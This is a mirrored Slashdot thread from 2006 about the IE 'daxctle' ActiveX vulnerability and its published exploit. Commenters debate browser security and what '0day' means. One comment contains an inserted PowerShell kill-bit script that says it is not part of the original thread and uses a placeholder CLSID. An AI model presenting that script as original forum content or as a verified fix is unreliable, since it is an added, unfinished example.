Slashdot Mirror


Code Posted For New IE Exploit

PC World is reporting that two days ago hackers posted code for a new vulnerability in Internet Explorer that could allow drive-by takeover of a vulnerable PC. Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild, but they are taking the new threat seriously. Symantec calls the bug "critical" and Secunia rates it highly critical, the most severe rating. The hackers who posted the sample code, xsec.org, refer to it as a "0day" exploit. The article quotes another security expert who calls this label "a stretch." Update: 09/17 18:00 GMT by C: Fixed link to XSec. Thanks for pointing that one out, folks.

123 comments

  1. Wrong Link in Subject by Anonymous Coward · · Score: 5, Informative

    That's xsec.org not xsec.com

    1. Re:Wrong Link in Subject by WilliamSChips · · Score: 1

      What does the goatsecant of x have to do with anything?

      --
      Please, for the good of Humanity, vote Obama.
    2. Re:Wrong Link in Subject by Anonymous Coward · · Score: 0

      Rather, that is now goatse.ca, not goatse.cx, as the latter has been suspended by the .cx folks.

  2. ZOMG IE EXPLOIT, MUST BE A DUPE?!? by Anonymous Coward · · Score: 0

    Or maybe not... in any case, here is the patch:

    1. Re:ZOMG IE EXPLOIT, MUST BE A DUPE?!? by CRCulver · · Score: 1

      Funny you use Emacs-W3M in your "IE alternative" joke. It was recently removed from Gentoo because it is unmaintained and may not work with future versions of Emacs.

    2. Re:ZOMG IE EXPLOIT, MUST BE A DUPE?!? by Anonymous Coward · · Score: 0

      > Funny you use Emacs-W3M in your "IE alternative" joke.

      What's funny about that? I suppose you need a sense of humor to use Emacs instead of vim?

    3. Re:ZOMG IE EXPLOIT, MUST BE A DUPE?!? by Anonymous Coward · · Score: 0

      That's not a patch, it's a replacement. And a poor one too.

    4. Re:ZOMG IE EXPLOIT, MUST BE A DUPE?!? by Bing+Tsher+E · · Score: 1

      What the hell is this 'vim' crap? vi is a 30K binary on my system (NetBSD) not some bloated third-party clone.

  3. Another bloody ActiveX exploit by Anonymous Coward · · Score: 0

    These ActiveX exploits are driving me nuts. I don't use IE (thank God), but I'm still willing to supply the feathers if someone else will get the tar.

  4. Moo by Chacham · · Score: 4, Insightful

    Another ActiveX exploit. *yawn*

    If you want to be safe in IE, turn off ActiveX from untrusted sites. Hasn't this been known since day one?

    News would be if ActiveX was tested and found to be safe.

    1. Re:Moo by cubicledrone · · Score: 1, Insightful

      Oh noes! Don't criticize teh billywindows! The PC Magazine fanzorz will moderate troll troll troll.

      Ah yes. PC Magazine. Where Macs don't exist and "power-hungry" appears in every third headline.

      --
      Business isn't willing to pay for products, innovation and careers, so we get brands, mortgage commercials and layoffs.
    2. Re:Moo by dvice_null · · Score: 1

There have been reports about trusted sites being hacked and spyware/viruses being planted on them. So there really isn't a thing called "trusted site". So if you want to be safe in IE, switch to Linux. If you want to be almost safe in IE, don't use it. I recommend Firefox instead.

    3. Re:Moo by Bing+Tsher+E · · Score: 1

      Well, to be fair, PCs only exist as limp parodies of the real thing in MacWorld and other Mac-only publications.

    4. Re:Moo by vhogemann · · Score: 2, Interesting

      A better alternative would be not use IE at all.

      I know most users just don't care, or don't know better. But what about developers and companies? These should be treating IE like a plague, and using it only when there's no other suitable alternatives, on a sandboxed environment.

I used to care about IE compatibility when I designed my pages... but not anymore. I realized that most businesses already expect some kind of requirements for the software you sell or build for them; mine is a modern browser, with decent CSS support. They even have choices: Firefox, Mozilla, Konqueror, Safari or Opera.

      ActiveX should be dead and buried by now. It's broken beyond any possible fix; Microsoft should be required to fix it, or remove it from Windows.

      --
      ---- You know how some doctors have the Messiah complex - they need to save the world? You've got the "Rubik's" complex
    5. Re:Moo by trezor · · Score: 1, Informative

      Switch to Linux and watch all my applications which I need to do my job fail. Yes, that sounds like a plan. For the record I'm a .NET developer who needs Visual Studio and SQL Server to do my work.

      You may find it hard to believe but Windows is a pretty damn secure OS, given that the one using it knows what he's doing. I'm not using MSIE, I'm not using Windows Media Player. And I have yet to have my machine BSOD, get infected with spyware/virus nor have to reinstall it periodically because it's unresponsive. My system is working excellently and does what I want it to do, and does it better than any Linux setup I can come up with.

Making people believe they are "secure" only by switching to another OS is stupid at best. If people don't know how their systems work, you can be sure as hell they won't be able to secure it. There is no system that is more secure than its admin is competent.

      Fine, you use Linux, it works for you. Congratulations on that! But branding it as a universal solution is just stupid.

      --
Not Buzzword 2.0 compliant. Please speak English.
    6. Re:Moo by Chacham · · Score: 1

ActiveX should be dead and buried by now.

      Perhaps you mean ActiveX on untrusted sites. On an intranet especially, or certain trusted sites, it can be invaluable.

    7. Re:Moo by Anonymous Coward · · Score: 0

I wish one could do that, but plainly ignoring 75% of internet users is fucking stupid. NO sane business would choose that. And there are countless businesses that use Windows/IE exclusively for their intranet (if you meant when designing "intranet" web sites or such), and for them there isn't a whole lot more choice. Mostly Firefox or Opera. And in both cases, that still means they have to install/deploy a new app to tons of PCs and maintain/update/patch it - one more hassle - and a totally unnecessary one at that - for every already overworked IT dept. I don't design for IE (I don't even take it into consideration), but before I "ship", it's made to work with IE at least half-decently.

      IE sucks _very_badly_ (v7 included), but willingly ignoring the largest user base in the world (and not saving very much work either)? That's called idiocy. Anybody with a head on their shoulders will do the extra 0.1% work and have it work with everything out there.

    8. Re:Moo by Millenniumman · · Score: 1

      I'm sorry, but you're wrong. Linux is much more secure for most users. If you can't install the OS, and use it, you won't have any security problems.

      --
      Stupidity is like nuclear power, it can be used for good or evil. And you don't want to get any on you.
    9. Re:Moo by NoTheory · · Score: 1

Yes, and you can reduce your risk of car accidents by moving into the middle of the Sahara desert. The statement may be true, but it's not very useful. As for grandparent, so you develop w/ .NET, that's great for you too. I believe that VS is in the WINE list of apps. You've picked your platform, but that doesn't mean that you've got rock-solid justification for it. Ultimately the platform you pick is about your laziness, and what you want to be lazy about.

      --
      There are lives at stake here!
    10. Re:Moo by kula.shinoda · · Score: 1

      That wouldn't be news, it would be fud :)

      --
      Real men don't write sigs
    11. Re:Moo by Reaperducer · · Score: 1

      I have yet to have my machine BSOD, get infected with spyware/virus nor have to reinstall it periodically because it's unresponsive. My system is working excellently and does what I want it to do

      That's great. But what if you want to use it on day two?

      --
      -- I'm old enough to have lived through six different meanings of the word "hacker."
    12. Re:Moo by Reaperducer · · Score: 1

      Strawman!! Strawman!!

      Sorry... I got carried away there. Everyone else on Slashdot misuses that term. I didn't want to feel left out.

      --
      -- I'm old enough to have lived through six different meanings of the word "hacker."
    13. Re:Moo by x2A · · Score: 1

      ...and instead use one of the many other browsers that never has any bugs 'n exploits, like erm... errr... um... anyway, yeah, then you'd be totally secure!

      --
      The revolution will not be televised... but it will have a page on Wikipedia
  5. Semantics but.. by Anonymous Coward · · Score: 0

    A '0day exploit' is remarking on how recent it is, not the security factor. If it's real recent then it's 0day. No idea why a 'security expert' would call that a 'stretch'.

    1. Re:Semantics but.. by n0-0p · · Score: 2, Informative

      A 0-day refers to an undisclosed vulnerability; however, some people have stretched the definition to mean unpatched vulnerability. It's considered a stretch because an unpatched vulnerability is still known, so precautions can be taken. With a true 0-day vulnerability/exploit, you would have no knowledge of the issue and no way of protecting specifically against it.

    2. Re:Semantics but.. by mattpalmer1086 · · Score: 1

      No, 0-day refers to an exploit that is released the same day as the vulnerability it exploits is announced. If the vulnerability hasn't been announced at all, it's not a 0-day exploit.

  6. Since /.'s already turned into bugtraq... by mobby_6kl · · Score: 2, Funny
    1. Re:Since /.'s already turned into bugtraq... by Kangie · · Score: 0

      Because that would be like cheating at Roulette. We don't need stuff like that. This IS news for nerds, right? Only geeks need exploits.

    2. Re:Since /.'s already turned into bugtraq... by elronxenu · · Score: 3, Informative
      Perhaps because the first bug you mentioned was posted 4 months ago, you can resolve it by upgrading your kernel, and almost nobody would run an application chrooted under an SMBFS network filesystem anyway.

The second bug is only a DoS, it won't give an attacker sweet r00t permissions. And it's also 4 months old news.

      The third bug doesn't result in any privilege escalation because the kextload program isn't setuid, you'd need to find some other vulnerability in a program which uses kextload.

      And the fourth bug is a month old already, hasn't been proven to be exploitable (more likely to simply crash firefox), and is easily resolved by upgrading firefox.

    3. Re:Since /.'s already turned into bugtraq... by Mixel · · Score: 1, Offtopic

      Okay, one of my few attempts to be funny... and I totally fuck up. Figures. I hate sensitive trackpads. Won't be trying this again for a while.

    4. Re:Since /.'s already turned into bugtraq... by Bing+Tsher+E · · Score: 1

      You won't be trying what? Posting off-topic side comments with your +2 enabled? You just did it twice in a row.

      People: check on 'No Karma Bonus' when posting side comments. Your every word does NOT warrant being made at +2.

    5. Re:Since /.'s already turned into bugtraq... by Anonymous Coward · · Score: 0

      It was not even slightly funny, it was something an 8 year old kid would say, grow up.

    6. Re:Since /.'s already turned into bugtraq... by Mixel · · Score: 0, Offtopic

      People: check on 'No Karma Bonus' when posting side comments. Your every word does NOT warrant being made at +2.

First post was a premature accident. My second post was +1, but then modded +2 'Underrated'. Which is strange, but some slashdotters are apparently very kind and are happy to forgive me for my silliness.

    7. Re:Since /.'s already turned into bugtraq... by Anonymous Coward · · Score: 0
      Well, the joke's on the original poster cause I saw the mod +4 funny and decided to post my reply anyway. The original comment wasn't funny and is indistinguishable from a Windows fanboy whining that Linux and related bugs are underreported. Somebody who is clueless might think the 4 mentioned bugs constitute some serious problem in Linux (or MacOSX) which hasn't been addressed by the developers. All I did was point out that those bugs are not serious, were addressed, and in all but one case, are not "news".

    8. Re:Since /.'s already turned into bugtraq... by Fyre2012 · · Score: 0

      ...but some slashdotters are apparently very kind...

      Wow... for a second had to double check my address bar to make sure I was still on slashdot.

      --
      This is not the greatest .sig in the world, no. This is just a tribute.
    9. Re:Since /.'s already turned into bugtraq... by Millenniumman · · Score: 1

      You're merely jealous that you don't have excellent karma. :D

      --
      Stupidity is like nuclear power, it can be used for good or evil. And you don't want to get any on you.
    10. Re:Since /.'s already turned into bugtraq... by Bing+Tsher+E · · Score: 1

      bullshit. there's a setting in the preferences to default your comments to 1, and turn off the +1 for 'karma'.

      (and you thought you were gonna bait me into using the +1 to reply to your troll, huh?)

  7. September 13, not September 15 by Infosec+Geek · · Score: 2, Informative
    Since this was dated September 17, make that four days ago, not two.

    Check the date on the xsec.org page referred to, daxctle2.c. milw0rm 2358 was a re-publication of this, also posted up on 09/13/2006. Republication happened at other exploit advisory sites as well, such as the SecuriTeam(TM) site, where, for some strange reason, the exploit was published twice, redundantly.

    The formal vulnerability advisories SA21910 and FrSIRT/ADV-2006-3593, from Secunia and FrSIRT respectively, posted on 09/14/2006, confirmed and extended this, since both groups developed internal versions of daxctle2.c which were reliably effective in compromising fully patched instances of IE6.0 on WXPSP2.

    However, both these advisories made it clear that the root cause flaw was in the ActiveX component that was so successfully and famously attacked by HD Moore in July.

    Friday's MS advisory, Microsoft Security Advisory (925444), both clarified matters and proposed two workarounds that might be of more use than shutting down ActiveX or fervent prayer, namely:
    1. Disable just the DirectAnimation Path ActiveX Control in the Registry, or
    2. Modify the ACL of the actual file Daxctle.ocx to be more restrictive.
    Assuming, of course, that one considers it wise to use MSIE at all, given a choice. But PHBs from coast to coast have left many millions of cube inmates with exactly that: no choice.
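Workaround 1 above, the kill bit, as a PowerShell script. This is an added example, not code from the thread or from Microsoft's advisory; the CLSID below is a placeholder to be replaced with the one Microsoft Security Advisory 925444 names, and the function names `Set-ActiveXKillBit` and `Test-ActiveXKillBit` are my own.

```powershell
# Added example: set and verify an ActiveX "kill bit" for one control.
# A kill bit is a per-CLSID flag under the ActiveX Compatibility key that tells
# Internet Explorer never to instantiate that control, whatever page asks for it.
# $Clsid is a PLACEHOLDER; take the real CLSID of the DirectAnimation Path
# control from Microsoft Security Advisory 925444. Run from an elevated shell.

$KillBitFlag = 0x400   # COMPAT_EVIL_DONT_LOAD: IE refuses to load the control

function Get-ActiveXCompatKey {
    param([Parameter(Mandatory=$true)][string]$Clsid)
    return "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Set-ActiveXKillBit {
    param([Parameter(Mandatory=$true)][string]$Clsid)
    $key = Get-ActiveXCompatKey -Clsid $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    # OR the kill bit in so that any compatibility bits already set survive
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' `
        -Value ($current -bor $KillBitFlag) -Type DWord
}

function Test-ActiveXKillBit {
    # Returns $true only if the key exists and the 0x400 bit is present
    param([Parameter(Mandatory=$true)][string]$Clsid)
    $key = Get-ActiveXCompatKey -Clsid $Clsid
    $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $flags) -and (($flags -band $KillBitFlag) -ne 0)
}

# PLACEHOLDER CLSID: replace with the value from advisory 925444
$Clsid = '{00000000-0000-0000-0000-000000000000}'

Set-ActiveXKillBit -Clsid $Clsid
if (Test-ActiveXKillBit -Clsid $Clsid) {
    "Kill bit set for $Clsid"
} else {
    "Kill bit NOT set for $Clsid - check that the shell is elevated"
}

# Workaround 2 from the advisory, restricting who may read the control's file,
# is one icacls call (placeholder path; confirm the file location on the host):
# icacls "$env:SystemRoot\System32\Daxctle.ocx" /deny Everyone:(RX)
```

The kill bit survives re-registration of the control and does not depend on the user's security zone settings, which is why it is preferred over turning ActiveX off wholesale.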
    1. Re:September 13, not September 15 by RAMMS+EIN · · Score: 1

      ``the exploit was published twice, redundantly''

      And you are repeating yourself, twice, redundantly, saying the same thing multiple times without adding new information. ;-)

      --
      Please correct me if I got my facts wrong.
    2. Re:September 13, not September 15 by Technician · · Score: 1

      Assuming, of course, that one considers it wise to use MSIE at all, given a choice. But PHBs from coast to coast have left many millions of cube inmates with exactly that: no choice.

Many of us cube inmates use IE internally as required. On break, we re-boot into a live Linux CD and are unable to log into the corp domain, but happily point Firefox at the corp autoproxy and surf away.
      It is safe for the corp as nothing is saved to disk. I love Ubuntu for this.

      --
      The truth shall set you free!
  8. Firefox 1.5.07? by jiushao · · Score: 1, Interesting

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit? These stories about IE exploits come off as pure Microsoft-hate masturbation.

    1. Re:Firefox 1.5.07? by makomk · · Score: 2, Interesting

      Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit?

      Key word: fixing. As far as I can tell, this security hole is currently unpatched.

    2. Re:Firefox 1.5.07? by Pecisk · · Score: 3, Insightful

Probably because there is code in the wild for this exploit and the bug itself is still unfixed?

      --
      user@ubuntubox:~$ stfu This server is going down for shutdown NOW!
    3. Re:Firefox 1.5.07? by Anonymous Coward · · Score: 0

There was a critical RSA vuln and some contrived spoofing attack which requires the user to accept a self-signed cert (without manually checking) after someone has intercepted their DNS requests. The other vulns, like most web browser exploits, require javascript. The real story is how web 2.0 (tm) is being built on an insecure technology that people are foolish to leave enabled in any browser.

    4. Re:Firefox 1.5.07? by jiushao · · Score: 1

Granted, now they are fixed, but the exploits were known for at least several days before the update was made available (and another few days before the automatic updates pick up on it). Similarly we can probably expect a Microsoft patch within a week (as has been the typical delay for more critical problems for some time; granted, the WMF exploit took 9 days, but that unfortunately happened during the holidays).

    5. Re:Firefox 1.5.07? by Vexorian · · Score: 1

So you are saying that, just to avoid people like you calling Slashdot an MS-hate central, Slashdot should avoid publishing a story about a new IE exploit even though it is news for nerds and stuff that matters?

      Boy, you must accept that this news item wasn't biased; it didn't come with the standard "It seems that MS screwed it again" nor any other POV, and the exploit does exist. So why get so offended?

      --

      Copyright infringement is "piracy" in the same way DRM is "consumer rape"
    6. Re:Firefox 1.5.07? by RonnyJ · · Score: 1

      The presence of this news item doesn't show bias.

      However, I would suggest that the lack of news items regarding security flaws in Firefox does show bias.

    7. Re:Firefox 1.5.07? by Wylfing · · Score: 4, Insightful

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit? These stories about IE exploits come off as pure Microsoft-hate masturbation.

      OK, smarty, I will explain the difference to you. On one hand we have Firefox, which is a piece of software that is free in both senses, and you can use it, or not use it, or delete from your system, or whatever you want. On the other hand we have Internet Explorer, which is forced upon you via "leveraging," you cannot remove, and you must use because of contrived tie-ins to fundamental system functions.

      If there is an exploit for Firefox, I can shrug my shoulders and use any of a dozen other browsers to look at web pages until it gets fixed. Or I can choose to continue using Firefox anyway, despite the risk. It's my choice. However, if there is an exploit in Internet Explorer, I am just plain screwed. I can't switch the goddamn thing off or remove it. Hell, there are plenty of applications and services that will gleefully launch IE of their own accord and start loading internets from God knows where, and there's no way for me to stop it. Because of Microsoft's predatory practices, I have no choice in the matter (except to abandon Windows altogether, which is also not an option -- see how all my choices have been removed?). You're damn right people are a lot more upset when exploits turn up in IE. We are required to suffer the fallout from them.

      --
      Our intelligent designer has never created an animal that we couldn't improve by strapping a bomb to it.
    8. Re:Firefox 1.5.07? by Anonymous Coward · · Score: 0

      Wait, so, what you're saying is that bugs in Firefox are OK, because you can use another browser.

      Correct me if I'm wrong, but if you're using Firefox, then you're using a browser other than Internet Explorer, right? So apparently you don't have to use Internet Explorer.

      In fact, you can change the default browser on the system (Firefox will do this automatically for you at that), causing other applications to open up Firefox instead of Internet Explorer when they need a web browser.

      I fail to see how you don't have a choice but to use Internet Explorer, especially when apparently you've decided to not use Internet Explorer. I know I have no problem using Firefox or Opera under Windows. Apparently you really can choose not to use Internet Explorer!

    9. Re:Firefox 1.5.07? by RonnyJ · · Score: 1

      You didn't actually address anything of the issue raised about Slashdot covering IE security issues more than Firefox issues, instead you went off on a wild tangent about how IE is integrated into the system.

      Sure, you can talk all you like about Firefox and other browsers being optional, etc., but that's not the issue being raised.

    10. Re:Firefox 1.5.07? by Bing+Tsher+E · · Score: 1

      No, I think he is saying that articles like this shouldn't be of much interest to the Slashdot community, since we're not stuck using IE. All these topics are for is to poke fun at Microsoft.

      I don't agree that this is the only reason the articles are published (for one thing, Slashdot is stacked with people who claim to be OSS-advocates who are probably browsing the site on their Mom's computer running Win Me and they get sent to their room if they install anything they downloaded on it).

    11. Re:Firefox 1.5.07? by RonnyJ · · Score: 2, Insightful
      That's contrary to what the second line in the summary says, though you've still been modded up despite posting no evidence to back your claim up.

      Security companies say that no exploits using the "daxctle" vulnerability have yet been found in the wild

    12. Re:Firefox 1.5.07? by cloudmaster · · Score: 1

      Someone else already mentioned that Firefox bugs actually get *fixed*, and often don't have exploits available until after they're disclosed.

      This bug is with a required piece of system software that you can't turn off, *and* it's not fixed yet, *and* there is a working exploit available. If you can think of other similar situations that aren't reported, please, feel free to submit them. Otherwise, your apples don't belong in this orange tree.

    13. Re:Firefox 1.5.07? by Hercules+Peanut · · Score: 1

Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical heap corruption exploits and an honest to god RSA signature spoofing exploit? These stories about IE exploits come off as pure Microsoft-hate masturbation.

      I don't know, perhaps because they were fixed??

    14. Re:Firefox 1.5.07? by Anonymous Coward · · Score: 1, Informative

RTFM.
      IE can't be removed.
      IE is not only used for web browsing purposes, but is started and used by quite a few applications.
      How's the Windows Update doing without IE?

    15. Re:Firefox 1.5.07? by ultranova · · Score: 1

      You didn't actually address anything of the issue raised about Slashdot covering IE security issues more than Firefox issues, instead you went off on a wild tangent about how IE is integrated into the system.

      Slashdot covers IE security issues more often than Firefox security issues because IE gets new exploits much more often than Firefox, and since IE is used in a lot more machines than Firefox, IE security issues have far more potential for destruction than Firefox security issues, making them more newsworthy.

      It's a bit like why forest fires in Amazon jungles get reported more often than forest fires in Antarctica.

      --

      Forget magic. Any technology distinguishable from divine power is insufficiently advanced.

    16. Re:Firefox 1.5.07? by jiushao · · Score: 1

      Sure, after a week of them being public knowledge (a few days for the fix to turn into a release, another few for the release to get out the door), which, coincidentally, is largely the same turnaround that Microsoft has had on serious flaws as of late.

    17. Re:Firefox 1.5.07? by suv4x4 · · Score: 1

      If there is an exploit for Firefox, I can shrug my shoulders and use any of a dozen other browsers to look at web pages until it gets fixed. Or I can choose to continue using Firefox anyway, despite the risk. It's my choice. However, if there is an exploit in Internet Explorer, I am just plain screwed. I can't switch the goddamn thing off or remove it.

I'm getting tired of explaining this, but here we go again: do you notice the shiny E on your desktop? This is IE. Now, if you're thinking of double clicking it and visiting sites, then perform the following steps not to use IE:

      1. do not double-click the blue E.

      Wish you good luck!

    18. Re:Firefox 1.5.07? by isorox · · Score: 1

      Considering that Firefox is the more common browser on Slashdot, how about doing a story about Firefox 1.5.07 fixing four separate critical...

      Because the first I, and many or most firefox users, heard about the bugs, was when Firefox told me that a bug fix was waiting to be installed. By the time I got to slashdot, it wasn't news, or a threat.

    19. Re:Firefox 1.5.07? by Anonymous Coward · · Score: 0

No, I watch this site fairly much every day. Dozens AND dozens of 'Microsoft did XYZ OMG IT IS THE BAD'. It happens in some sort of open source software and sits unfixed for YEARS (which is the case for some Firefox issues btw) and it's 'oh well, at least it's not Microsoft'.

      Also FF is gaining traction it HAS some decent marketshare. On this site it is nearly 75% usage 10-15 other places. Yet coverage is slanted towards IE. A bad FF bug gets my attention much quicker than an IE one these days.

And using your analogy we are in Antarctica...

    20. Re:Firefox 1.5.07? by AmberBlackCat · · Score: 1

      I don't know. I've been running Windows with Internet Explorer ever since I was playing with dolls and I've never had my system compromised by any browser exploit. I think all the people who defend Firefox and Linux by saying "this is pure fud" are just as likely to spew their own "fud".

    21. Re:Firefox 1.5.07? by archen · · Score: 1

      Although you cannot remove IE you can secure your system then choose not to use IE. If you turn on content advisor then only allow windowsupdate.com you can block pretty much all IE internet access (in theory). You can then remove IE in add-remove programs which just deletes all the icons to IE - can still be launched through iexplore though. Lastly if you want to manually use windows update, create an mmc snap in pointing there.

    22. Re:Firefox 1.5.07? by Anonymous Coward · · Score: 0

      To keep from IE just loading "internets" from "god knows where", just set an invalid proxy up.

      Not much HTTP going over port 7891 with address of FAKEPROXY.

  9. Re:Eh? by LaughingCoder · · Score: 4, Insightful

    OK, I'll answer the question. About 75% of web users still use IE.

    If you are a sys admin, or a web admin, Deal.

    --
    The more you regulate a company, the worse its products become.
  10. "not a 0day exploit" by wfberg · · Score: 4, Insightful

    The reason it's not a 0day exploit is because some other dude already discovered the vulnerability, but didn't disclose it to the public? And that second guy is sitting on another 3 or 4 vulnerabilities?

    I'm sorry, what's the definition of 0day exploit these days? If not exploit code for which there is no patch available, then what?

    Can we now use "responsible disclosure" to argue away the fact that actual computer systems are at risk of being exploited right here and now, by saying "yeah, well, you got rooted and all, but we knew about that bug, so it doesn't count, even though we don't have a patch yet."?

    Can we now take comments that the programmers left in the code ("// does this work?" "/* coded while druk */" "//BUGBUG") as an excuse to completely ignore actual vulnerabilities?

And hey, if TWO researchers come up with this vulnerability seemingly independently, what are the chances of the exploit already circulating in the black hat community? Close to 100%?

    By my definition you've got your negative-day and your zero-day exploits. Negative-day exploits; no patch yet. Zero-day; the patch has just been issued, so might as well give your exploit to scriptkiddies and botnet operators to use on the systems that don't patch early/often enough. Obviously, a negative-day exploit usually isn't going to be used on a large scale, because your average blackhatter wants to keep it in his toolkit to attack well-patched systems; after all, it's what gives him (and his leet skillz) an edge. Once patchday arrives, you might as well give it to some noobs, because they might be interested in unpatched targets, while a leet blackhatter is not.

    So no, it's not a "stretch" to call it 0day. It's negative day, even.

    --
    SCO employee? Check out the bounty
    1. Re:"not a 0day exploit" by n0-0p · · Score: 1

      I think your definition of zero day is ops-centric, and not security-centric. In this post I give the generally accepted definition in the security community, which agrees with Moore's statement. To summarize, the security community only uses 0-day to refer to undisclosed vulnerabilities, and it does not address patch lag.

    2. Re:"not a 0day exploit" by wfberg · · Score: 1

      Undisclosed to whom? The second guy seemed to be sitting on the vulnerability. He might've disclosed to Microsoft, but has the public learned of this vulnerability before? If not, they can't be taking any precautions.

      --
      SCO employee? Check out the bounty
    3. Re:"not a 0day exploit" by n0-0p · · Score: 1

I assumed the qualifier was understood; I meant publicly disclosed, not just disclosed to the vendor. Also, I'm not sure if you're familiar with how disclosure works, but it's not in Moore's best interests to reveal that he's sitting on vulnerabilities unless he intends to disclose them soon. So he may be practicing responsible disclosure and allowing the vendor a reasonable amount of time to complete a patch. Or he may have other reasons for waiting.

      Security disclosure in general is a pretty complicated game of posturing and politicking. At its best it can be a genuinely altruistic form of public service. At its worst it's extortion scams and weapons trafficking.

    4. Re:"not a 0day exploit" by wfberg · · Score: 1

I assumed the qualifier was understood; I meant publicly disclosed, not just disclosed to the vendor. Also, I'm not sure if you're familiar with how disclosure works, but it's not in Moore's best interests to reveal that he's sitting on vulnerabilities unless he intends to disclose them soon.

      In this case, it seems like disclosure isn't working - particularly "responsible" disclosure. Otherwise no one would be reporting vulnerabilities that others *claim* are already known (by whom? not the guy claiming the 0day).

      --
      SCO employee? Check out the bounty
    5. Re:"not a 0day exploit" by edxwelch · · Score: 1

      You're right, it *is* a zero day exploit. There have been quite a lot of them recently, but they haven't done much damage because they depend on the user navigating to a malicious web site with IE and ActiveX switched on.
      What would really be a lot of fun is a Blaster-type zero day worm.
      (If you remember, Blaster only required the user to connect to the internet to be infected.)

    6. Re:"not a 0day exploit" by spinja · · Score: 2, Informative

      The reason I don't consider it "0day" is that a public tool exists that will discover this bug in its default configuration (AxMan). Anyone who took the time could run the tool, discover the bug, and write the exploit. The tool was released on August 1st and this particular bug was reported to Microsoft in late July. Since all of this information was *widely* publicized at the time of release (a couple dozen articles on AxMan), I have a hard time considering any of the bugs it turns up "0day" in the normal sense. We need a new term, but "negative day" probably isn't it either. The remaining 3-4 easily exploitable bugs (of the ~100 or so that were never included in the Month of Browser Bugs) will likely stay unpublished until a patch is available.

      It's funny to see how releasing an exploit accelerates patch development. I have been waiting on the Spline and KeyFrame patches for over a month already, but it wasn't until the xsec guy rediscovered these that Microsoft decided to release a patch. Maybe there is something to this "full-disclosure" thing after all =)

      -HD

  11. Make sure to post exploits from other platforms too by Anonymous Coward · · Score: 0

    ...otherwise the Microsoft apologists will have to do it.

  12. Does not affect IE7 by I'm+Don+Giovanni · · Score: 3, Interesting

    This does not affect IE7:
    http://blogs.msdn.com/ie/archive/2006/09/15/756736.aspx

    (Just for edification. ;-))

    --
    -- "I never gave these stories much credence." - HAL 9000
    1. Re:Does not affect IE7 by rs232 · · Score: 1

      Yea, by disabling ActiveX and removing Direct Animation. But does that actually fix the defects in the controls themselves?

      --
      davecb5620@gmail.com
    2. Re:Does not affect IE7 by The+MAZZTer · · Score: 1

      I tried a bunch of ActiveX vulnerabilities for IE6 in IE7. Some didn't even work in IE6 (probably because I didn't have Office or some other MS ActiveX controls). Only 2 out of 15-20 worked in IE7.

  13. winpologists out in force by rs232 · · Score: 2, Informative

    Slashdot has done stories on bugs in Firefox. See ..

    Slashdot | 611 Defects, 71 Vulnerabilities Found In Firefox

    Firefox Analyzed for Bugs by Software

    Spyware Disguises Itself as Firefox Extension

    I've also noticed how the same kind of comments from the Winpologists get modded up very quickly.

    was Re:Firefox 1.5.07?

    --
    davecb5620@gmail.com
    1. Re:winpologists out in force by jiushao · · Score: 1

      There is no apologizing for exploits, it is bad whoever has them. On the other hand the nature of the last round of exploits in Firefox is rather really interesting, and as such newsworthy. The cryptographic signature exploit especially warrants a rather interesting technical discussion.

    2. Re:winpologists out in force by rs232 · · Score: 1

      Yea, "On the other hand .." let's not talk about bugs in IExplorer.

      --
      davecb5620@gmail.com
  14. IE by DragonTHC · · Score: 0, Troll

    do people still use IE? I thought that was a thing that went out with all your base and peanut butter jelly time!

    --
    They're using their grammar skills there.
  15. Re:Eh? by Vexorian · · Score: 0, Flamebait

    90% actually. Yeah, mod redundant please

    --

    Copyright infringement is "piracy" in the same way DRM is "consumer rape"
  16. vulnerability?? by azman075918 · · Score: 1

    I'm new here. Just want to add my comment about vulnerability. I think most users worldwide don't even care about vulnerabilities in IE. Only some of the users who really care about this are taking action such as patching or reporting the vulnerability. All they know is that IE runs as it is supposed to. Some say that using Firefox is good, but if the user doesn't even update, there are vulnerabilities there too. I still remember one of my friends didn't even know that his PC had already been taken over by someone else. I think the most important thing is that all users must be alert. That's all.

    1. Re:vulnerability?? by dvice_null · · Score: 1

      That's why Firefox has autoupdate. People who don't even know what a security update is are getting updated automatically, usually within a day or two of the security release. (I have seen questions in Firefox support forums from people asking what that update thing they saw was all about, which should be proof that people are getting updated, whether they understand it or not.)

    2. Re:vulnerability?? by gigne · · Score: 1

      Welcome to Slashdot. Prepare to spend lots of time reading meaningless articles such as these.

      As for your comment... No, users don't care as long as it works. Most people I know with ie as their main browser have all kinds of crap installed. Those annoying toolbars, flashing smileys, and popups all over the place. There is no educating these people, as they don't care to be educated. They see the windows box as a magic device that "should just work" regardless of how reckless they are with their browsing habits.

      Um... I don't really know where I am going with this comment, but your point that the user must be alert is a moot point. Users don't care enough to be interested in these alerts, and presented with this information wouldn't care to do anything about it. I guess it is ultimately MS's problem, and they should fix it. If users are too ignorant to get the latest patches, then more fool them.

      --
      Signature v3.0, now with 42% less memory usage.
  17. how to detect an untrusted site .. by rs232 · · Score: 1, Insightful

    "if you want to be safe in IE, turn off ActiveX from untrusted sites"

    How do you know what is or is not an untrusted site?

    How in any way is that comment "insightful"?

    --
    davecb5620@gmail.com
    1. Re:how to detect an untrusted site .. by SLi · · Score: 4, Insightful

      Huh? If you don't have any specific reason to trust it, it's untrusted. I would have thunk that's Internet 101.

    2. Re:how to detect an untrusted site .. by Anonymous Coward · · Score: 0

      If you don't have any specific reason to trust it, it's untrusted.

      What the parent is probably wondering is about the bolded part above and when there's a reason to trust something or not.

